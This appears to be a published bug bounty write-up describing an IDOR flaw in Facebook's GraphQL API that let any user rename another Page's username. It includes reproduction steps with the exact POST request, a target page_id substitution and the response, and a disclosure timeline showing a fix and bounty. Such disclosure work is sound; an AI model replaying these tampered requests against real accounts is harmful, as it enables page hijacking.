Support the victims of the Beirut Explosion by donating as part of our Read and Donate campaign  »  Involve Now
Marcos Ferreira

Published On: 14 Sep 2020

$15,000

Change the username for any Facebook Page

IDOR
Facebook | Web
---
HIGH VALID

In Facebook pages, an administrator has the option to create a unique username for a page. This means that you can have personalized URLs, allowing people to access them faster.

Description

Due to an incorrect GraphQL configuration, any user could have changed the URL of any existing Facebook page.

Impact

This could have allowed a malicious user to change a page's username, allowing the user to create a new page using the original URL.




Reproduction Steps

Step
1

Using the new 'FB5' Facebook desktop layout, navigate to your page.

 

Step
2

Click on “Create @username”, located under the page name.

 

Show Image

Step
3

Choose a random username for your page and click on “Create Username”

 

Show Image

Step
4

Using Burp Proxy, intercept and modify the following POST request:

POST /api/graphql/ HTTP/1.1
Host: facebook.com

fb_api_req_friendly_name=PagesCometAdminEditingUsernameMutation&

doc_id=2886327251450197&

variables={"input":{"end_point":"comet_left_nav_bar","entry_point":"comet","page_id":"0","skip_save_for_validation_only":false,"username":"TEST123456","actor_id":"0","client_mutation_id":"9"}}

Change page_id with your target's Page ID

Response

"data": { 
"page_edit_username": {
"error": null,
"username": "TEST123456"
}
}

Show Image

Step
5

The victim's page URL will be altered to "facebook.com/TEST123456", and the username will be available for any page to use

Timeline
.
Marcos 18 Jul 2020

Initial Report

.
Facebook 18 Jul 2020

Triaged Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will keep you upd ... See More

.
Facebook 20 Jul 2020

Bug Fixed We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch does not res ... See More

.
Marcos 20 Jul 2020

Confirmation of fix

.
Facebook 28 Aug 2020

Bounty awarded Your report highlighted a scenario where, due to an incorrect GraphQL configuration, a malicious user could have changed a Page’s URL name. Thi ... See More

VALID